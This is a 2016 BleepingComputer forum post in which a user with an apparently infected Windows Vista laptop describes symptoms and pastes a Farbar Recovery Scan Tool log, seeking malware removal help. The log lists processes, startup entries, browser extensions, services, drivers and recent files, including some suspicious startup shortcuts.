Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Post Artemis - Permissions & Other Problems


  • This topic is locked This topic is locked
69 replies to this topic

#1 vistanovice

vistanovice

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 02 August 2016 - 11:43 AM

I ran Kaspersky about 5 days ago and it identified Artemis as a virus. I think it is removed but am not sure. I also ran Combofix on advice elsewhere on the internet.Lots of trojans. Again, I think they were quarantined or deleted but...

 

Still have problems - more problems!

 

First, I cannot get permission to work with files (mostly images) on my back-up F drive. No permission. This is new.

 

I also think the system is messed up - sorry I'm not more technical. But I cannot seem to login as the owner. BTW this is a used laptop given me after my ASUS was killed online. I only use Firefox & have tried to remove IE but see it's still there with loads of bad files!

 

I can no longer play videos or watch livestream online. No trouble prior to this mess.

 

Firefox stops responding on certain sites (Twitter mostly) and my computer memory fills to 100%.

 

Just everything is wanky.

 

Here are the FRST logs. Thank you so much for your help. I've run out of computers & need this badly to make money.

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-07-2016
Ran by Scott (administrator) on 45TH (02-08-2016 12:06:57)
Running from C:\Users\Scott\Downloads
Loaded Profiles: Scott (Available Profiles: Scott)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) Language: English (United States)
Internet Explorer Version 7 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Agere Systems) C:\Windows\System32\agrsmsvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Acer Inc.) C:\Program Files\Common Files\Logitech\LComMgr\Communications_Helper.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Acer Inc.) C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Acer Inc.) C:\Acer\Empowering Technology\eNet\eNet Service.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(McAfee, Inc.) C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
() C:\Acer\Mobility Center\MobilityService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Acer Inc.) C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
() C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(acer) C:\Acer\Empowering Technology\ePower\ePowerSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(McAfee, Inc.) C:\Program Files\McAfee\SiteAdvisor\saUI.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [3784704 2006-11-09] (Realtek Semiconductor)
HKLM\...\Run: [LogitechCommunicationsManager] => C:\Program Files\Common Files\Logitech\LComMgr\Communications_Helper.exe [304664 2006-10-31] (Acer Inc.)
HKLM\...\Run: [Acer Assist Launcher] => C:\Program Files\Acer Assist\launcher.exe [1261568 2006-12-07] ()
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM\...\Run: [Eraser] => C:\Program Files\Eraser\Eraser.exe [1074112 2015-10-15] (The Eraser Project)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [562688 2015-02-11] (McAfee, Inc.)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [6851288 2016-07-13] (Piriform Ltd)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [ISUSPM Startup] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [249856 2005-08-11] (Macrovision Corporation)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [**rplp<*>] => "C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-19] (Microsoft Corporation)
AppInit_DLLs: C:\Windows\System32\eNetHook.dll => C:\Windows\System32\eNetHook.dll [90112 2006-12-28] (acer)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk [2016-08-02]
ShortcutTarget: a898e3.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk [2016-08-02]
ShortcutTarget: dff6bb.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * sasnative32
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0B445639-B454-43BF-A2FB-49D9E835E9DB}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{67B129A9-08A7-498B-A699-72217FD81C36}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{6BF2A6AC-91B3-4434-886D-03542BCADFD6}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKLM - (No Name) - {f0e98552-8e47-4c6c-9b3a-11ab0549f94d} -  No File
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Toolbar: HKLM - No Name - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} -  No File
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Toolbar: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll [2015-03-03] (McAfee, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988
FF Homepage: hxxp://k2b-bulk.ebay.com/ws/eBayISAPI.dll?ListingConsole&currentPage=LCActive
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-08-01] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1215155.dll [2014-12-10] (Adobe Systems, Inc.)
FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files\Free Ride Games\npExentCtl.dll [No File]
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-03-03] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin: www.exent.com/GameTreatWidget -> C:\Program Files\Free Ride Games\NPGameTreatPlugin.dll [No File]
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\Ask.xml [2014-12-25]
FF Extension: McAfee WebAdvisor - C:\Program Files\McAfee\SiteAdvisor\saffplg.xpi [2016-07-29]
FF Extension: AddThis - C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\{3e0e7d2a-070f-4a47-b019-91fe5385ba79} [2016-08-01]
FF Extension: LastPass - C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\support@lastpass.com [2016-08-01]
FF Extension: BetterPrivacy - C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-08-01]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-02] [not signed]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor\saffplg.xpi

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [aaaaafeopjhkcolncjbedbhofpocmdbn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [aaaaaikjhckghnoaaaehhmgjcfajoabi] - C:\Users\Scott\AppData\Local\imeshjzipmusictoolbar\GC\toolbar.crx [2014-07-09]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2016-02-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 eLockService; C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe [24576 2006-12-22] (Acer Inc.) [File not signed]
R2 eNet Service; C:\Acer\Empowering Technology\eNet\eNet Service.exe [126976 2006-12-28] (Acer Inc.) [File not signed]
R2 eRecoveryService; C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe [49152 2006-12-28] (Acer Inc.) [File not signed]
R2 eSettingsService; C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe [24576 2007-01-02] () [File not signed]
R2 EvtEng; C:\Program Files\Intel\WiFi\bin\EvtEng.exe [860160 2008-10-16] (Intel® Corporation) [File not signed]
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R2 LightScribeService; c:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed]
R2 McAfee SiteAdvisor Service; c:\Program Files\McAfee\SiteAdvisor\McSACore.exe [132160 2016-02-12] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [690408 2015-03-03] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [476680 2015-02-27] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [196600 2015-02-17] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [334576 2015-02-24] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [238288 2015-02-17] (McAfee, Inc.)
R2 MobilityService; C:\Acer\Mobility Center\MobilityService.exe [107008 2006-11-24] () [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [43520 2006-11-08] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53248 2006-11-08] (Hewlett-Packard) [File not signed]
R2 RegSrvc; C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe [466944 2008-10-16] (Intel® Corporation) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-19] (Microsoft Corporation)
R2 WMIService; C:\Acer\Empowering Technology\ePower\ePowerSvc.exe [135168 2007-01-02] (acer) [File not signed]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 45F8A0B2; C:\Windows\System32\drivers\45F8A0B2.sys [153784 2016-07-29] (Kaspersky Lab ZAO)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [61848 2015-02-17] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
R2 int15; C:\Acer\Empowering Technology\eRecovery\int15.sys [76584 2006-12-07] ()
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [304928 2015-02-17] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [260248 2015-02-17] (McAfee, Inc.)
R0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [82800 2015-02-17] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [371648 2015-02-17] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [648552 2015-02-17] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [380496 2015-01-16] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [80760 2015-01-16] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [217584 2015-02-17] (McAfee, Inc.)
R3 NTIDrvr; C:\Windows\System32\DRIVERS\NTIDrvr.sys [6144 2006-12-05] (NewTech Infosystems, Inc.) [File not signed]
S3 ADASPROT; \??\C:\Program Files\Advanced System Optimizer 3\adasprot32.sys [X]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-19] (Microsoft Corporation)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 catchme; \??\C:\Users\Scott\AppData\Local\Temp\catchme.sys [X]
S3 EraserUtilDrv11010; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11010.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lv321av; system32\DRIVERS\lv321av.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-02 12:06 - 2016-08-02 12:08 - 00018121 _____ C:\Users\Scott\Downloads\FRST.txt
2016-08-02 12:05 - 2016-08-02 12:06 - 00000000 ____D C:\FRST
2016-08-02 12:04 - 2016-08-02 12:05 - 01744384 _____ (Farbar) C:\Users\Scott\Downloads\FRST.exe
2016-08-02 11:47 - 2016-08-02 11:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-08-01 21:36 - 2016-08-01 21:36 - 00000529 _____ C:\Users\Scott\Downloads\WindowsMediaPlayerConfiguration.diagcab
2016-08-01 21:35 - 2016-08-01 21:35 - 00000438 _____ C:\Users\Scott\Downloads\videodiagnostic10.diagcab
2016-08-01 12:16 - 2016-08-01 12:16 - 00000000 ___SD C:\ComboFix
2016-07-31 04:28 - 2016-08-01 15:46 - 01025448 _____ C:\Windows\ntbtlog.txt
2016-07-31 04:26 - 2016-07-31 04:04 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts.20160731-042604.backup
2016-07-31 04:08 - 2016-07-31 04:08 - 00013592 _____ C:\ComboFix.txt
2016-07-31 03:39 - 2016-07-31 03:41 - 00003626 _____ C:\Users\Scott\Desktop\Rkill.txt
2016-07-31 03:24 - 2016-07-31 03:24 - 00025490 _____ C:\Users\Scott\Desktop\Remove.odt
2016-07-31 02:47 - 2016-07-31 02:47 - 00000000 ____D C:\ProgramData\Avg
2016-07-31 02:46 - 2016-07-31 02:46 - 03143504 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Scott\Downloads\AVG_Protection_Free_1606.exe
2016-07-30 19:52 - 2016-07-30 19:53 - 101581200 _____ (Kaspersky Lab ZAO) C:\Users\Scott\Downloads\KVRT(1).exe
2016-07-29 15:30 - 2016-07-29 15:48 - 00000000 ____D C:\KVRT_Data
2016-07-29 15:30 - 2016-07-29 15:30 - 00153784 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\45F8A0B2.sys
2016-07-29 15:09 - 2016-06-07 11:34 - 00434176 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-07-29 15:09 - 2016-06-07 11:33 - 00516096 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-07-29 15:05 - 2016-07-29 15:06 - 100528016 _____ (Kaspersky Lab ZAO) C:\Users\Scott\Downloads\KVRT.exe
2016-07-29 13:49 - 2015-12-10 17:08 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-07-29 13:49 - 2015-12-10 17:08 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-07-29 13:49 - 2015-12-10 17:08 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 06122496 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 03641344 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-07-29 13:49 - 2015-12-10 17:07 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-07-29 13:49 - 2015-12-10 17:06 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2016-07-29 13:49 - 2015-12-10 15:42 - 00390144 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-07-29 13:49 - 2015-12-10 15:36 - 00026624 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-07-29 13:49 - 2015-12-10 15:35 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-07-29 10:50 - 2016-07-29 10:51 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Scott\Downloads\uSeRiNiT.exe
2016-07-29 10:25 - 2013-09-23 13:48 - 00147912 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2016-07-29 10:22 - 2016-07-29 10:22 - 00000000 ____D C:\Program Files\McAfee.com
2016-07-29 10:21 - 2016-08-02 10:52 - 00000000 ____D C:\Program Files\McAfee
2016-07-29 10:14 - 2016-07-29 10:14 - 05659746 ____R (Swearware) C:\Users\Scott\Downloads\ComboFix.exe
2016-07-29 10:03 - 2015-02-17 14:50 - 00238288 _____ (McAfee, Inc.) C:\Windows\system32\mfevtps.exe
2016-07-29 08:56 - 2016-07-29 08:59 - 00000000 ____D C:\Program Files\stinger
2016-07-29 08:51 - 2016-07-29 08:51 - 07708304 _____ (McAfee, Inc.) C:\Users\Scott\Downloads\Setup_serial_CwDqKrH4MqJL8AEPKpNBNw2_key.exe
2016-07-29 05:14 - 2016-07-29 05:14 - 00453031 ____R C:\Windows\system32\Drivers\etc\hosts.20160729-051440.backup
2016-07-22 07:26 - 2016-07-22 07:25 - 00453031 ____R C:\Windows\system32\Drivers\etc\hosts.20160722-072613.backup
2016-07-19 06:41 - 2016-07-19 06:40 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160719-064124.backup
2016-07-14 07:15 - 2016-07-14 07:14 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160714-071526.backup
2016-07-14 03:23 - 2016-06-10 10:19 - 02071040 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-07-14 03:22 - 2016-06-25 11:37 - 00626176 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-07-14 03:22 - 2016-06-25 11:37 - 00443904 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-07-14 03:22 - 2016-06-25 11:37 - 00216064 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-07-14 03:22 - 2016-06-25 11:37 - 00122880 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-07-14 03:22 - 2016-06-25 10:40 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2016-07-10 04:31 - 2016-07-10 05:11 - 00000000 ____D C:\Program Files\Avira
2016-07-10 04:31 - 2016-07-10 05:04 - 00000000 ____D C:\ProgramData\Avira
2016-07-10 04:12 - 2016-07-10 04:12 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160710-041256.backup
2016-07-10 03:47 - 2016-07-10 03:47 - 00000462 _____ C:\Users\Scott\Desktop\BLOG - Shortcut.lnk
2016-07-09 09:11 - 2016-07-09 09:11 - 00000000 ____D C:\Users\Scott\AppData\Roaming\0a30ba
2016-07-04 03:43 - 2016-07-04 03:43 - 00000534 _____ C:\Users\Scott\Downloads\MaintenanceDiagnostic.diagcab

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-02 12:04 - 2016-03-30 20:14 - 00000000 ____D C:\Users\Scott\AppData\LocalLow\LastPass
2016-08-02 11:43 - 2016-03-30 21:15 - 00000644 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2016-08-02 11:42 - 2006-11-02 09:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
